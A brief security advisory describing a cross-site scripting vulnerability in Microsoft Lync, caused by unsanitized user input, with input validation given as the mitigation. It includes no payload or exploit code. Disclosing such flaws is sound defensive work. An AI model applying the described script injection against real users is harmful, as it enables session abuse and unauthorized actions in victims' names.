Microsoft Lync Cross-Site Scripting Vulnerability

Microsoft Lync is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to perform unauthorized actions on behalf of the victim.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate web pages.
